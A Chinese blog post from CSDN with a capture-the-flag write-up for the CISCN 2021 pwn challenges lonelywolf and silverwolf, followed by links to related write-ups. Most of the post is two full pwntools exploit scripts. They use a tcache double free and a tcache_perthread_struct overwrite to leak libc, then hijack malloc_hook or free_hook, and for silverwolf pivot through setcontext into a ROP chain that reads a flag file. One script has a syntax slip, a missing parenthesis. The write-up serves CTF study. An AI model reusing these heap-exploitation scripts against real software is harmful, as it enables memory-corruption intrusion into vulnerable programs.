ciscn_2021_pwn_lonelywolf&silverwolf

最新推荐文章于 2024-05-12 22:03:44 发布
最新推荐文章于 2024-05-12 22:03:44 发布
阅读量833 收藏
点赞数 1
分类专栏: pwn 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49697396/article/details/117002771
版权

一、lonelywolf

  1. 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址
  2. 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址
  3. 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地址
  4. 利用之前修改tcache_perthread_struct的申请地址再次修改tcache_perthread_struct的chunk申请地址(改为malloc_hook/free_hook)
  5. 申请该大小的chunk,修改malloc_hook为one_gadget
如图申请到tcache_perthread_struc+0x10地址
这时tcache_perthread_struc已经进入unsorted_bin
更改malloc_hook为one_gadget


脚本如下:
 

from pwn import*
sh=process('./lonelywolf')
libc=ELF('./libc-2.27.so')
su=lambda x,y:sh.sendafter(x,y)
sue=lambda x,y:sh.sendlineafter(x,y)
def cmd(ch):
    sue('ice:',str(ch))
def add(index,size):
    cmd(1)
    sue('dex:',str(index))
    sue('ize',str(size))
def edit(index,content):
    cmd(2)
    sue('dex:',str(index))
    sue('tent:',content
def show(index):
    cmd(3)
    sue('dex:',str(index))
def delm(index):
    cmd(4)
    sue('dex:',str(index))
one=[0x4f3d5,0x4f432,0x10a41c]
add(0,0x78)
delm(0)
edit(0,'a'*0x10)
delm(0)
show(0)
sh.recvuntil(': ')
leak_heap=u64(sh.recvuntil('\x0a',drop='False').ljust(8,'\x00'))
print hex(leak_heap)
tcache_s=leak_heap & 0xfffffffff000
print hex(tcache_s)
edit(0,p64(tcache_s+0x30))
add(0,0x78)
add(0,0x78)
fake='\x08'*8*4+p64(tcache_s+0x010)+p64(tcache_s+0x010)+p64(tcache_s+0x70)
edit(0,fake)
add(0,0x20)
delm(0)
show(0)
libc_add=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=libc_add-0x3ebca0
free_hook=0x3ed8e8+libc_base
malloc_hook=0x3ebc30+libc_base
sym=one[2]+libc_base
print '[+]libc_base'+hex(libc_base)
add(0,0x30)
edit(0,p64(malloc_hook))
add(0,0x50)
edit(0,p64(sym))
gdb.attach(sh,'x/gx $rebase(0x202058)')
add(0,0x20)
sh.interactive()

二、silverwolf

与前一题不同的是,本题开了沙箱只能orw

可以修改free_hook为setcontext+53来进行rop(orw)

setcontext+53的执行流程
修改rdi+0xa0为写有rop_gadget地址的堆地址,之后会执行mov rsp,qword ptr[rdi+0xa0]

 

效果如下

脚本如下:

from pwn import*
#context(log_level='debug')
context(arch='amd64')
#sh=remote()
sh=process('./silverwolf')
pop_rdi=0x1123
pop_rsi_r15=0x1121
libc=ELF('./libc-2.27.so')
one=[0x4f3d5,0x4f432,0x10a41c]
fini_arry=0x201D50
su=lambda x,y:sh.sendafter(x,y)
sue=lambda x,y:sh.sendlineafter(x,y)
def cmd(ch):
	sue('ice:',str(ch))
def add(index,size):
	cmd(1)
	sue('dex:',str(index))
	sue('ize',str(size))
def edit(index,content):
	cmd(2)
	sue('dex:',str(index))
	sue('tent:',content)
def show(index):
	cmd(3)
	sue('dex:',str(index))
def delm(index):
	cmd(4)
	sue('dex:',str(index))
def init():
	for i in range(12):
		add(0,0x10)
	add(0,0x50)
	for i in range(11):
		add(0,0x60)
	for i in range(10):
		add(0,0x70)
init()
#gdb.attach(sh)
add(0,0x78)
delm(0)
edit(0,'a'*0x10)
delm(0)
show(0)
sh.recvuntil(': ')
leak_heap=u64(sh.recvuntil('\x0a',drop='False').ljust(8,'\x00'))
print'[+]=leak_heap=='+ hex(leak_heap)
tcache_s=leak_heap-0x1000 & 0xfffffffff000
print hex(tcache_s)
edit(0,p64(tcache_s+0x30))
add(0,0x78)
add(0,0x78)
fake='\x08'*8*4+p64(tcache_s+0x010)+p64(tcache_s+0x010)+p64(tcache_s+0x70)
edit(0,fake)
add(0,0x20)
#gdb.attach(sh,'x/gx $rebase(0x202058)')
delm(0)
show(0)
libc_add=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=libc_add-0x3ebca0
free_hook=0x3ed8e8+libc_base
malloc=0x3ebc30+libc_base
leave=0x54913+libc_base
sret=libc_base+0x3f040
sym=one[2]+libc_base
print '[+]libc_base=='+hex(libc_base)
add(0,0x30)
payload=p64(libc_base+libc.symbols['_IO_2_1_stdout_'])+p64(tcache_s+0x70)
edit(0, payload)
add(0,0x50)
env=libc_base+libc.symbols['environ']
leak=p64(0xfbad1800)+p64(0)*3+p64(env)+p64(env+0x20)
edit(0,leak)
stack_add=u64(sh.recvuntil('\x7f')[-6:].ljust(0x8,'\x00'))
print'[+]=stack_addr==='+hex(stack_add)
add(0,0x60)
edit(0,payload)
leak2=p64(0xfbad1800)+p64(0)*3+p64(stack_add-0x6d8)+p64(stack_add-0x6d0)
add(0,0x50)
edit(0,leak2)
pie_add=u64(sh.recvuntil('\x55')[-6:].ljust(8,'\x00'))
pie_base=pie_add-0x11c9
print '[+]==pie_base'+hex(pie_base)
add(0,0x60)
payload=p64(free_hook)
edit(0,payload)
#gdb.attach(sh,'x/gx $rebase(0x202058)\n b*$rebase(0xDBA)\n p __free_hook')
add(0,0x50)
edit(0,p64(libc_base+libc.sym['setcontext']+53))
add(0,0x70)
syscall=libc_base+libc.sym['read']+15
pop_rax=libc_base+0x43ae8
pop_rsi=libc_base+0x23eea
pop_rdi+=pie_base
pop_rdx=libc_base+0x1b96 
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
payload='\x07'*0x40+p64(tcache_s+0x200)*4+p64(tcache_s+0x120)+p64(tcache_s+0x50)
edit(0,payload)
add(0,0x60)
payload=p64(tcache_s+0x10)*5+p64(tcache_s+0xb0)+p64(tcache_s+0x200)
edit(0,payload)
#gdb.attach(sh,'x/gx $rebase(0x202058)\n b*$rebase(0xDBA)\n p __free_hook')
payload_rip=p64(pop_rdi)
payload_stack=p64(tcache_s+0x10)+p64(pop_rax)+p64(2)+p64(syscall)
payload_stack+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(tcache_s+0x300)+p64(pop_rdx)+p64(0x30)
payload_stack+=p64(read)+p64(pop_rdi)+p64(1)+p64(write)
print 'len==='+hex(len(payload_stack))
add(0,0x78)
edit(0,payload_stack)
payload_rip=p64(tcache_s+0x200)+payload_rip
add(0,0x60)
edit(0,payload_rip)
add(0,0x40)
edit(0,'./flag')
gdb.attach(sh,'x/gx $rebase(0x202058)\n b*$rebase(0xDBA)\n p __free_hook')
delm(0)
sh.interactive()

 

牛头人_ntr
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 211
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
csicn2021 sliverwolf 详细思路和exp
最新发布
z22168的博客
05-12 897
CISCN2021 sliverwolf
silverwolf
wuyvle的博客
07-18 1256
这个题和看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基值,rop中我们注入gadget来进行栈迁移,我们这里利用利用 setcontext 来控制rsp from pwn import * context.update(terminal=['tmux','splitw','-h']) p=process('./silverwolf') elf=ELF('./libc-2.27.so') def add(idx,size): p.rec
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 814
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 707
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn_2021_lonelywolf.zip
05-17
2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛中某一题目或团队的代号...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 420
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 217
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1146
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1296
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1490
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
2021-ciscn-pwn-lonlywolf复现
weixin_45209963的博客
06-06 608
Lonlywolf 国赛题难度可以…先爬了 做的复现… 这里使用的exp是nuoye大佬的版本 先膜一波 主函数没什么特殊的 add/del/print/edit都有 add要求小于0x78(120),而且只保存了当前拿到的chunk地址 free有典型的UAF edit正常 没有off by null 遇’\n’停止。 print也正常。 下面来说说做法 这题麻烦的是手里只有一个地址 leak完了不方便攻击 直接攻击又没有地址 nuoye大佬的做法是tcache perthread corrup
BUUCTF刷题2
m0_51251108的博客
05-22 363
gyctf_2020_borrowstack: 关键词:栈迁移 使用可控制的地址覆盖ebp的值,使用leave;ret指令所在地址覆盖ret的值,迁移后要填充4或8 read的时候用send 这题首先注意: 1.bss段离plt,got很近,要适当抬高迁移的位置 3.用system拿,估计还得要栈迁移,麻烦,用og简单, from pwn import* r=remote('node3.buuoj.cn',26005) #r=process('./gyctf_2020_borrowstack') conte
UNCTF2021WP.pdf
12-10
"UNCTF2021WP.pdf 包含了多个网络安全竞赛的解题攻略,涉及Web、Pwn等领域。" 在这个PDF文档中,详细介绍了UNCTF2021网络安全竞赛中的若干挑战及其解决方案。以下是根据提供的部分内容对各个知识点的详细说明: **...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值